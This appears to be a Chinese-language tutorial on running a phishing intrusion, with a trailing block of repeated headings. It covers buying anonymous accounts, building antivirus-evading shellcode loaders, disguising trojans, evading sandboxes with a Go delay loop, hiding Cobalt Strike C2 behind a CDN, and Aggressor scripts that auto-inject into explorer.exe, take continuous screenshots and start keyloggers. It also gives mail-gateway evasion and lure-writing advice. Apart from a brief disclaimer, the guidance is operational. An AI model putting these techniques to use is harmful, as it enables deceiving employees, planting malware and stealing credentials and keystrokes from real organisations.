社工钓鱼基本流程与技术实现<\/h1>

前言<\/h2>
"穷则社工钓鱼，达则0day炸场"——微步在线。在没有后端资源支持的情况下，社工钓鱼是安全从业者的必备技能。本文详细讲解社工钓鱼的完整流程和技术实现细节。<\/p>

一、前期准备<\/h2>

1.1 社交账号准备<\/h3>

账号类型<\/strong>：微信、QQ、脉脉、BOSS直聘、猎聘等<\/li>

手机号来源<\/strong>：

阿里小号\/和多号<\/li>
辅助注册（微信）<\/li>
匿名渠道购买（更安全）<\/li> <\/ul> <\/li>
邮箱准备<\/strong>：

常用QQ邮箱、163邮箱<\/li>
购买渠道或向亲友借用<\/li> <\/ul> <\/li> <\/ul>
1.2 免杀木马制作<\/h3>
基本加载器原理<\/h4>
\/\/ ShellcodeLoader基本流程 <\/span><\/span><\/span><\/span>1.<\/span> shellcode申请内存<\/span>(可读可写<\/span>) -><\/span> VirtualAlloc <\/span><\/span>2.<\/span> 载入内存<\/span> -><\/span> memcpy <\/span><\/span>3.<\/span> 执行内存<\/span> -><\/span> CreateThread +<\/span> WaitForSingleObject <\/span><\/span><\/code><\/pre>免杀技术要点<\/h4> 函数替代<\/strong>：申请内存：GlobalAlloc、CoTaskMemAlloc<\/li> 执行内存：使用回调函数如EnumFontsW、EnumUILanguages、EnumFontFamiliesA<\/li> <\/ul> <\/li> 推荐项目<\/strong>： 360QVM_bypass（增加签名功能）<\/li> 学习GitHub上的免杀项目进行修改<\/li> <\/ul> <\/li> <\/ul> 木马伪装技巧<\/h4> 修改图标<\/li> 添加数字签名<\/li> 捆绑正常exe文件<\/li> 释放时提示"文件已损坏，无法打开"<\/li> <\/ul> 1.3 沙箱绕过技术<\/h3> 以微步沙箱为例的对抗方法：<\/p> \/\/ 循环打印延时技术 <\/span><\/span><\/span><\/span>func<\/span> add<\/span>() { <\/span><\/span> start<\/span> :=<\/span> time<\/span>.Now<\/span>() <\/span><\/span> sum<\/span>, i<\/span> :=<\/span> 0<\/span>, 1<\/span> <\/span><\/span> for<\/span> i<\/span> < 1000000<\/span> { <\/span><\/span> fmt<\/span>.Println<\/span>(i<\/span>) \/\/ 循环打印 <\/span><\/span><\/span><\/span> sum<\/span> +=<\/span> i<\/span> <\/span><\/span> i<\/span>++<\/span> <\/span><\/span> } <\/span><\/span> elapsed<\/span> :=<\/span> time<\/span>.Since<\/span>(start<\/span>) <\/span><\/span> fmt<\/span>.Println<\/span>("该函数执行完成耗时："<\/span>, elapsed<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>技术要点：<\/p> 避免使用Sleep函数（容易被hook）<\/li> 沙箱分析有时间限制，通过长时间循环绕过<\/li> 将延时代码放在shellcode执行前<\/li> <\/ul> 二、信息收集<\/h2> 2.1 信息收集思维导图<\/h3> 信息收集 ├── 公司基本信息 │ ├── 官网 │ ├── 业务范围 │ └── 组织架构 ├── 人员信息 │ ├── 高管信息 │ ├── 技术人员 │ └── HR\/招聘人员 ├── 联系方式 │ ├── 邮箱格式 │ ├── 电话格式 │ └── 社交账号 └── 业务信息 ├── 招聘信息 ├── 招标信息 └── 合作伙伴 <\/code><\/pre> 2.2 具体收集方法<\/h3> 零零信安<\/strong>：直接搜索公司名称获取邮箱地址<\/li> 搜索引擎技巧<\/strong>：组合搜索：@xxx.com 招聘<\/code><\/li> 组合搜索：@xxx.com 校招<\/code><\/li> 组合搜索：@xxx.com 投标<\/code><\/li> 组合搜索：@xxx.com 联系方式<\/code><\/li> <\/ul> <\/li> 微信搜一搜<\/strong>：使用邮箱后缀+关键字搜索<\/li> <\/ol> 三、C2基础设施搭建<\/h2> 3.1 基本配置<\/h3> 使用Cobalt Strike(CS)作为C2平台<\/li> 通过CDN隐藏真实IP<\/li> C2上线端口反代<\/li> <\/ul> 3.2 实用CS插件脚本<\/h3> 推荐使用PushPlus2插件，包含以下功能：<\/p> 自动迁移进程<\/h4> sub callback{<\/span> <\/span><\/span> $regex =<\/span> '<\/span>(.*<\/span>\<\/span>n)+<\/span>explorer.<\/span>exe<\/span>\<\/span>t\<\/span>d+<\/span>\<\/span>t(<\/span>\<\/span>d+)(.*<\/span>\<\/span>n)+<\/span>'<\/span>;<\/span> <\/span><\/span> $listener =<\/span> "ecloud"<\/span>;<\/span> \/\/ 修改为你的监听器名称 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>$2 ismatch $regex){<\/span> <\/span><\/span> $pid =<\/span> matched()[<\/span>1<\/span>];<\/span> <\/span><\/span> $inject_pid =<\/span> $pid;<\/span> <\/span><\/span> if<\/span> (-<\/span>is64 $1){<\/span> $arch =<\/span> "x64"<\/span>;<\/span> }<\/span> <\/span><\/span> else<\/span>{<\/span> $arch =<\/span> "x86"<\/span>;<\/span> }<\/span> <\/span><\/span> binject(<\/span>$1,<\/span> $pid,<\/span> $listener,<\/span> $arch);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span>if<\/span>(<\/span>$inject_pid !=<\/span> beacon_info(<\/span>$1,<\/span>"pid"<\/span>)){<\/span> <\/span><\/span> bps(<\/span>$1,<\/span> &<\/span>callback);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>上线自动截图<\/h4> \/\/ 单次截图 <\/span><\/span><\/span>\/\/ binput($1, "screenshot"); <\/span><\/span><\/span>\/\/ bscreenshot($1); <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 连续截图 <\/span><\/span><\/span><\/span>binput(<\/span>$1,<\/span> "screenwatch"<\/span>);<\/span> <\/span><\/span>bscreenwatch(<\/span>$1);<\/span> <\/span><\/span><\/code><\/pre>其他实用功能<\/h4> \/\/ 执行自定义命令 <\/span><\/span><\/span><\/span>bshell(<\/span>$1,<\/span> "ipconfig \/all"<\/span>);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 键盘记录 <\/span><\/span><\/span><\/span>bkeylogger(<\/span>$1);<\/span> <\/span><\/span><\/code><\/pre>3.3 权限维持<\/h3> Bypass UAC技术<\/li> 计划任务添加<\/li> 服务持久化<\/li> 可编写CS脚本实现上线自动执行<\/li> <\/ul> 四、邮件钓鱼技术<\/h2> 4.1 邮件网关\/沙箱对抗<\/h3> 正文处理<\/h4> 避免出现知名公司名称（如脉脉、BOSS直聘）<\/li> 不将附件解密密码放在正文中<\/li> <\/ul> 附件处理<\/h4> 文件名加密<\/li> 将解压密码写在附件名称上<\/li> 使用压缩包+密码保护<\/li> <\/ul> 4.2 钓鱼话术设计<\/h3> 根据收集的信息定制化内容<\/li> 常见场景：招聘相关<\/li> 业务合作<\/li> 系统通知<\/li> 会议邀请<\/li> <\/ul> <\/li> 保持专业性，减少怀疑<\/li> <\/ul> 五、上线后操作流程<\/h2> 参考L33h0m的CS钓鱼流程导图：<\/p> 权限维持<\/strong> 获取持久化权限<\/li> 提升权限<\/li> <\/ul> <\/li> 信息收集<\/strong> 内网信息<\/li> 敏感数据<\/li> 凭证收集<\/li> <\/ul> <\/li> 后渗透阶段<\/strong> 横向移动<\/li> 权限提升<\/li> 目标达成<\/li> <\/ul> <\/li> <\/ol> 六、总结与注意事项<\/h2> 社工钓鱼是系统性工程<\/strong>，需要前期充分准备<\/li> 免杀是基础<\/strong>，需要持续更新对抗技术<\/li> 信息收集决定成功率<\/strong>，越详细越好<\/li> 保持隐蔽性<\/strong>，所有操作应考虑对抗检测<\/li> 法律风险<\/strong>，仅供安全研究学习<\/li> <\/ol> 参考资源<\/h2> 360QVM_bypass<\/a><\/li> ShellcodeLoader<\/a><\/li> 分享我的CS钓鱼流程导图<\/a><\/li> Aggressor Script官方文档<\/li> <\/ol> 本文详细讲解了社工钓鱼的完整流程和技术实现细节，从前期准备到后期渗透，涵盖了关键技术和注意事项。请务必在合法授权范围内使用这些技术进行安全测试和研究。<\/p>

社工钓鱼基本流程与技术实现<\/h1>

前言<\/h2> "穷则社工钓鱼，达则0day炸场"——微步在线。在没有后端资源支持的情况下，社工钓鱼是安全从业者的必备技能。本文详细讲解社工钓鱼的完整流程和技术实现细节。<\/p>

一、前期准备<\/h2>

1.2 免杀木马制作<\/h3>

二、信息收集<\/h2>

三、C2基础设施搭建<\/h2>

3.2 实用CS插件脚本<\/h3> 推荐使用PushPlus2插件，包含以下功能：<\/p>

四、邮件钓鱼技术<\/h2>

4.1 邮件网关\/沙箱对抗<\/h3>

前言<\/h2>
"穷则社工钓鱼，达则0day炸场"——微步在线。在没有后端资源支持的情况下，社工钓鱼是安全从业者的必备技能。本文详细讲解社工钓鱼的完整流程和技术实现细节。<\/p>

3.2 实用CS插件脚本<\/h3>
推荐使用PushPlus2插件，包含以下功能：<\/p>